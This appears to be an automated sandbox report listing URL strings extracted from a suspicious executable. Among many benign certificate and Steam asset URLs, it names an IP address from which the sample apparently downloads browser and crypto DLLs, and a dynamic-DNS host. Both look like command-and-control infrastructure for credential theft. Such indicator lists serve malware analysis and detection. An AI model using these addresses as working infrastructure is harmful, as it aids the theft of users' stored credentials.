Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.ECBGCBFHIJJK
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.FHIJJK
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgJJK
Source: 7ZthFNAqYp.exe, 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hoptoBFHIJJK
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: 7ZthFNAqYp.exe, 7ZthFNAqYp.exe, 00000002.00000002.3417459044.000000006FD7D000.00000002.00000001.01000000.00000008.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: 7ZthFNAqYp.exe, 00000002.00000002.3402218568.000000002026D000.00000002.00001000.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199786602107[1].htm.2.dr	String found in binary or memory: https://95.217.220.103
Source: 7ZthFNAqYp.exe, 00000002.00000003.3175941738.0000000001147000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/%
Source: 7ZthFNAqYp.exe, 00000002.00000003.3277338251.000000000114C000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215990470.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175887042.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3125256711.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262340532.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3277209575.0000000001186000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3125794093.0000000001195000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3125916467.0000000001195000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/?
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125256711.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3125794093.0000000001195000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3125916467.0000000001195000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/G
Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/a
Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.000000000109C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/en-GB
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/freebl3.dllO
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/freebl3.dlli
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/mozglue.dll
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/msvcp140.dll
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262340532.000000000114C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/nss3.dll
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/nss3.dll2
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262340532.000000000114C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/nss3.dllc
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/nss3.dlln
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/r
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/softokn3.dll
Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/sqlp.dll
Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/v
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.000000000109C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/vcruntime140.dll
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.000000000109C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/vcruntime140.dllnV
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103AEB
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103CAA
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: 76561199786602107[1].htm.2.dr	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/css/applications/community/main.css?v=Pwd1k_5lFECQ&l=en
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/css/globalv2.css?v=dQy8Omh4p9PH&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/css/promo/summer2017/stickers.css?v=P8gOPraCSjV6&l=engl
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/css/skin_1/header.css?v=pTvrRy1pm52p&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/css/skin_1/profilev2.css?v=t9xiI4DlPpEB&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
